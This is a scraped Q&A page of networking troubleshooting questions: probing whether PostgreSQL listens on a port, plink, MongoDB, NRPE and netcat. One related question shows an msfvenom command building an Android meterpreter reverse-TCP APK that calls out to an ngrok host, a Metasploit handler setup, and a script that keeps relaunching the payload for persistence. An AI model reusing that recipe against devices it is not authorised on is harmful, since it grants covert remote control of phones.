Given an IP Address and port number, is it possible to check if the machine with that IP address has Postgresql listening on the specified port? If so, how?
I just want to obtain a boolean value of whether Postgresql is listening on the specified port of the specified machine.
You can use, for example, nmap tool:
=$ sudo nmap -v -p 5930 127.0.0.1
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-25 19:28 CEST
Initiating SYN Stealth Scan at 19:28
Scanning localhost (127.0.0.1) [1 port]
Discovered open port 5930/tcp on 127.0.0.1
Completed SYN Stealth Scan at 19:28, 0.03s elapsed (1 total ports)
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000045s latency).
PORT STATE SERVICE
5930/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
Raw packets sent: 1 (44B) | Rcvd: 2 (88B)
Alternatively you can just "SELECT 1" with psql, and check output:
=$ psql -h 127.0.0.1 -p 5930 -c "select 1"
?column?
----------
1
(1 row)
=$ psql -h 127.0.0.1 -p 5940 -c "select 1"
psql: could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 5940?
I think you need to define what you're trying to achieve better. Do you just want to know if anything is listening on a certain point? If PostgreSQL is listening on a given port? If PostgreSQL is running and actually accepting connections? If you can connect to PostgreSQL, authenticate successfully and issue queries?
One option is to invoke psql to connect to it and check the result code. Do not attempt to parse the output text, since that's subject to translation into different languages.
Better, use the client library for the language of your choice - psycopg2 for Python, PgJDBC for Java, the Pg gem for Ruby, DBD::Pg for Perl, nPgSQL for C#, etc. This is the approach I'd recommend. The SQLSTATE or exception details from any connection error will tell you more about why the connection failed - you'll be able to tell the difference between the server not listening, authentication failure, etc this way. For example, in Python:
import psycopg2
try:
conn = psycopg2.connect("host=localhost dbname=postgres")
conn.close()
except psycopg2.OperationalError as ex:
print("Connection failed: {0}".format(ex))
There are exception details in ex.pgcode (the SQLSTATE) to tell you more about errors that're generated server-side, like authentication failures; it'll be empty for client-side errors.
If you just want to see if something is listening on a given IP and TCP port, you can use netcat (*nix only), or a simple script in the language of your choice that creates a socket and does a connect() then closes the socket if it gets a successful response. For example, the following trivial Python script:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(('localhost',5432))
s.close()
except socket.error as ex:
print("Connection failed with errno {0}: {1}".format(ex.errno, ex.strerror))
The same approach applies in any programming language, just the details of the socket library and error handling vary.
For some purposes it can also be useful to use the netstat tool to passively list which processes are listening on which network sockets. The built-in netstat on Windows is pretty brain-dead so you have to do more parsing of the output than with netstat for other platforms, but it'll still do the job. The presence of a socket in netstat doesn't mean that connecting to it will succeed, though; if the process has failed in some way that leaves it broken but still running (stuck in an infinite loop, blocked by a debugger, SIGSTOPed, etc) then it won't respond to an actual connection attempt.
In brief
In details
Fastest way is to use netcat aka nc with timeout ability as shared here
Results as 0/1 means postgres working/not-working
echo 'QUIT' | nc -w SECONDS YOUR_HOST PORT; echo $?
# eg
echo 'QUIT' | nc -w 1 localhost 5432; echo $?
Another also-faster way that works for me is to use telnet as discussed here.
echo -e '\x1dclose\x0d' | telnet YOUR_HOST PORT
# eg
echo -e '\x1dclose\x0d' | telnet localhost 5432
Related
I have an Android device at home that I use to develop on, and I'm connecting to it through my laptop with adb and scrcpy.
However, if I'm not home adb doesn't see the device. I made an apk for the device with msfvenom for reverse tcp like this:
msfvenom -p android/meterpreter/reverse_tcp LHOST=x.tcp.ngrok.io LPORT=(ngrok port) R > /home/user/reversetcp.apk
then I set up the reverse tcp handler in msfconsole:
msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
msf6 exploit(multi/handler) > exploit
After this I install and run the apk on my device, then meterpreter opens the session;
[*] Meterpreter session 1 opened (127.0.0.1:25565 -> 127.0.0.1:40146) at 2023-01-07 21:39:43 +0100
and the ngrok console shows up 1 connection (my device). But if I try to add the ngrok server to adb like this:
adb connect "ngrok address"
(there I tried the ngrok tcp link, and 127.0.0.1 with both ports, none of them works) I get the following error: failed to connect to '127.0.0.1:25565': Connection refused I could make a vpn on my local network, but the power usually goes down, so the vpn is a dead end. what am I doing wrong? or adb can't connect with ngrok?
My second issue is, that meterpreter randomly closes the session after around 8 minutes, and if the device powers off and on or if the power goes out the device switches from wifi to mobile data, and I can't reconnect. How can I make the apk run on startup and reconnect if there is a change in the internet connection?
Update: I made an shell script to reopen the reverse tcp apk after 10 mins or if there is internet connection, but it would be better if the connection wouldn't close, and the device isn't rooted, so I can't add the script to the folder to run on startup. Another way to keep the reverse tcp connection would be better, to open an reverse tcp (and keep it open), and if there is change in the internet connection then reconnect automatically.
Btw, here is the script that i wrote:
#!/bin/sh
# check for internet connection
while ! ping -c 1 google.com &> /dev/null
do
# wait 20 seconds before trying again
sleep 20
done
# run the activity
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
# run the activity every 10 minutes
while true
do
sleep 600
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
done
I am convinced that it is not possible to connect a device using reverse meterpreter shell because ADB requires a raw TCP connection rather than meterpreter shell.
You can use the ZeroTier application to create a private network for your devices that can be accessible via the internet. It functions similarly to VPN, but traffic is routed directly rather than through a centralized VPN server.
This post describes how to connect adb using TCPIP in detail.
Goal: connect to AntMiner via SSH, and send poweroff command.
command: plink.exe -v -t -ssh antminer -l root -pw xxx poweroff
Connecting to 10.0.1.11 port 22
We claim version: SSH-2.0-PuTTY_Release_0.70
Server version: SSH-2.0-dropbear_2012.55
Using SSH protocol version 2
Using Diffie-Hellman with standard group "group14"
Doing Diffie-Hellman key exchange with hash SHA-1
Host key fingerprint is:
ssh-rsa 1039 xxx
Initialised AES-256 SDCTR client->server encryption
Initialised HMAC-SHA1 client->server MAC algorithm
Initialised AES-256 SDCTR server->client encryption
Initialised HMAC-SHA1 server->client MAC algorithm
Using username "root".
Sent password
Access granted
Opening session as main channel
Opened main channel
Allocated pty (ospeed 38400bps, ispeed 38400bps)
Started a shell/command
sh: poweroff: not found
Server sent command exit status 127
Disconnected: All channels closed
So the connection is working fine, it's the sending of the command that goes wrong.
Here's what SHOULD happen: (sent the command manually this time)
command: plink.exe -v -t -ssh antminer -l root -pw xxx
Connecting to 10.0.1.11 port 22
We claim version: SSH-2.0-PuTTY_Release_0.70
Server version: SSH-2.0-dropbear_2012.55
Using SSH protocol version 2
Using Diffie-Hellman with standard group "group14"
Doing Diffie-Hellman key exchange with hash SHA-1
Host key fingerprint is:
ssh-rsa 1039 xxx
Initialised AES-256 SDCTR client->server encryption
Initialised HMAC-SHA1 client->server MAC algorithm
Initialised AES-256 SDCTR server->client encryption
Initialised HMAC-SHA1 server->client MAC algorithm
Using username "root".
Sent password
Access granted
Opening session as main channel
Opened main channel
Allocated pty (ospeed 38400bps, ispeed 38400bps)
Started a shell/command
root#antMiner:~# poweroff
Broadcast message from root#antMiner (pts/0) (Thu Jan 25 19:23:19 2018):
The system is going down for system halt NOW!
root#antMiner:~# Server unexpectedly closed network connection
FATAL ERROR: Server unexpectedly closed network connection
Anybody have any idea WHY the sending of the command "poweroff" over plink fails?
This is covered in these questions:
Script via Plink in .bat behaves differently
sudo: command not found while using plink
So one easy solution is that you can try which poweroff in a normal session, to see where poweroff resides (can be /sbin/poweroff). And then use a full path in your plink command-line.
Though the right solution is to fix your startup scripts. See the links above.
As your command-line does not work even with the -t switch, your SSH server must execute a command in "exec" channel (used when a command is provided on command-line or using -m switch) differently than in a "shell" channel. This is rather unusual.
You can force plink to use "shell" channel (like in an interactive session) by using an input redirection:
echo poweroff| plink ...
I am using mongo 3.0.8. I have an authenticated user admin with password admin. I am able to connect to the mongo shell as follows.
mongo admin -u amdin -p amdin
However, i tried to connect to using the following C code. This gives me an error
WARNING: client: Failed to connect to: ipv4 127.0.0.1:27017,
error: 111, Connection refused
char URI[256];
snprintf(URI,256,"mongodb://admin:admin#127.0.0.1:27017/?authSource=admin");
mongoc_client_t *client = mongoc_client_new(URI);
The error error: 111, Connection refused is a networking error.
Your URI expecting to find the server listening on port 27017 of the same machine (127.0.0.1). Possible issues:
Server not running
Server not on that port
Server is bound to the "real ip address" of the machine.
There is local firewall (e.g. iptables) blocking access
Maybe an SELinux problem?
If this is a Linux box, these commands might help diagnose:
netstat -an -A inet | grep LISTEN
/sbin/iptables -L
I'm trying to excute the following command:
/usr/lib/nagios/plugings/check_nrpe -H xxxxxxx -c check_disk -a 60 80 /dev/sda1
but I got the following message:
CHECK_NRPE: Received 0 bytes from daemon. Check the remote server logs for error messages.
When I consult the log in the remote host, I found that:
anonymous rsyslogd-2359: action 'action 17' resumed (module 'builtin:ompipe') [try http://www.rsyslog.com/e/2359 ]
The command /usr/lib/nagios/plugings/check_disk -a 60 80 /dev/sda1 is working fine in the remote host.
A couple of things to check:
On the machine where you have NRPE installed, check the nrpe.cfg file. Make sure the allowed_hosts= line is uncommented and that its value includes the IP address of the Nagios server that's trying to connect to it. Make sure the dont_blame_nrpe line is uncommented and it's value is set to 1, i.e.: dont_blame_nrpe=1.
Restart nrpe.
If you have firewall rules enabled on this machine, make sure there's a rule to allow connections to tcp port 5666.
How do you test to see if your program is working and able to connect with server? I tried stackoverflow server's ip through port 40 and it fails after a min at connect().
test.exe 64.34.119.12 echo 40
Program arguments take a syntax: <Server IP> <Echo Word> [<Echo Port>]
Also, can you test without having to connect to internet?
You should be able to connect to your own echo server on 127.0.0.1:7 if it is running, or get a 'connection refused' (ECONN) if it isn't running. Either would show that your code is OK actually.
As for testing without having to connect to the internet...
I'd download netcat for windows.
NetCat download
Extract the tool, and run:
nc.exe -v -l -p [port]
If you do that, it opens up a "server" and you can connect to it using your application; just point the IP address to 127.0.0.1!